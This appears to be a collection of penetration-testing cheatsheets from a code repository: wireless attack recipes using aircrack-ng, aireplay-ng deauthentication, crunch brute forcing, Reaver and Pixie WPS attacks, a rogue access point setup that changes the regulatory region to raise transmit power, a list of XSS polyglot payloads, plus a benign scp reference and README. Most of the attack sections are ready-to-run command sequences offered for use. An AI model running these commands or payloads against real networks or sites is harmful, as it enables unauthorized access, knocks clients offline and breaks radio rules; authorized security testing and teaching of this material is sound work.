6 | sudo airmon-ng start wlan1 # start monitor mode 7 | sudo airodump-ng wlan1mon # start capturing 8 | sudo airodump-ng --bssid 64:66:B3:6E:B0:8A -c 11 wlan1mon -w output 9 | sudo aireplay-ng --deauth 5 -a 64:66:B3:6E:B0:8A wlan1mon # deauthenticate the client 10 | sudo aircrack-ng output-01.cap dict # crack the passphrase 11 | 12 | 13 | WPA PSK attack with aircrack-ng suite. 14 | -------------------------------------- 15 | 16 | Place your wireless card into Monitor Mode 17 | airmon-ng start wlan0 18 | 19 | Detect all available wireless AP’s and clients 20 | airodump-ng mon0 21 | 22 | Setting adapter channel 23 | iwconfig mon0 channel 24 | 25 | Capturing the four-way handshake 26 | airodump-ng --channel --bssid --write capture mon0 27 | 28 | You can capture the handshake passively (it takes time) or de-authenticate a client. 29 | 30 | De-authentication attack 31 | aireplay-ng --deauth 3 -a -c mon0 32 | 33 | Deauth every client - aireplay-ng -0 5 -a mon0 34 | 35 | Dictionary Attack 36 | aircrack-ng -w passwords.lst capture-01.cap 37 | 38 | Brute force Attack 39 | crunch 8 8 0123456789 | aircrack-ng -e "Name of Wireless Network" -w - /root/home/wpa2.eapol.cap 40 | 41 | 42 | WEP attack with aircrack-ng suite. 43 | ---------------------------------- 44 | 45 | Place your wireless card into Monitor Mode 46 | airmon-ng start wlan0 47 | 48 | Detect all available wireless AP’s and clients 49 | airodump-ng mon0 50 | 51 | Setting adapter channel 52 | iwconfig mon0 channel 53 | 54 | airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface) 55 | 56 | aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface) 57 | 58 | aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface) 59 | 60 | aircrack-ng -b (bssid) (file name-01.cap) 61 | 62 | 63 | Rogue Access Point Testing 64 | -------------------------- 65 | 66 | # ifconfig wlan0 down 67 | # iw reg set BO 68 | # iwconfig wlan0 txpower 0 69 | # ifconfig wlan0 up 70 | # airmon-ng start wlan0 71 | # airodump-ng --write capture mon0 72 | 73 | root@backbox:/home/backbox# ifconfig wlan1 down 74 | root@backbox:/home/backbox# iw reg set BO 75 | root@backbox:/home/backbox# ifconfig wlan1 up 76 | root@backbox:/home/backbox# iwconfig wlan1 channel 13 77 | root@backbox:/home/backbox# iwconfig wlan1 txpower 30 78 | root@backbox:/home/backbox# iwconfig wlan1 rate 11M auto 79 | 80 | 81 | Reaver 82 | ------ 83 | 84 | airmon-ng start wlan0 85 | airodump-ng wlan0 86 | reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv 87 | reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -S --no-nacks -d7 -vv -c 1 88 | 89 | 90 | Pixie WPS 91 | --------- 92 | 93 | airmon-ng check 94 | airmon-ng start wlan0 95 | airodump-ng wlan0mon --wps 96 | reaver -i wlan0mon -c 11 -b 00:00:00:00:00:00 -K 1 97 | 98 | 99 | Wireless Notes 100 | -------------- 101 | 102 | Wired Equivalent Privacy (WEP) 103 | RC4 stream cipher w/ CRC32 for integrity check 104 | - Attack: 105 | By sniffing an ARP packet, then replaying it to get many encrypted replies with different IVs. 106 | - Remediation: 107 | Use WPA2 108 | 109 | Wifi Protected Access (WPA) 110 | Temporal Key Integrity Protocol (TKIP) Message Integrity Check 111 | - Attack: 112 | Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station. 113 | - Remediation: 114 | Use long-keys 115 | 116 | Wifi Protected Access 2 (WPA2) 117 | Advanced Encryption Standard (AES) 118 | - Attack: 119 | Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station. 120 | - Remediation: 121 | WPA-Enterprise 122 | -------------------------------------------------------------------------------- /Cheatsheet_XSS.txt: -------------------------------------------------------------------------------- 1 | ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; 2 | alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- 3 | >">'> 4 | 5 | 6 | 7 | 8 | xxs link 9 | xxs link 10 | -------------------------------------------------------------------------------- /Cheatsheet_scp.txt: -------------------------------------------------------------------------------- 1 | [+] Secure Copy (scp) Cheatsheet 2 | -------------------------------- 3 | 4 | [>] Copy remote file to local host: 5 | 6 | $ scp your_username@192.168.0.10: /some/local/directory 7 | 8 | [>] Copy local file to remote host: 9 | 10 | $ scp your_username@192.168.0.10:/some/remote/directory 11 | 12 | [>] Copy local directory to remote directory: 13 | 14 | scp -r your_username@192.168.0.10:/some/remote/directory/ 15 | 16 | [>] Copy a file from one remote host to another: 17 | 18 | scp your_username@:/some/remote/directory/foobar.txt your_username@:/some/remote/directory/ 19 | 20 | [>] Improve scp performance (use blowfish): 21 | 22 | scp -c blowfish your_username@192.168.0.10:/some/remote/directory -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Cheatsheets 2 | =========== 3 | 4 | Penetration Testing/Security Cheatsheets that I have collated over the years. 5 | --------------------------------------------------------------------------------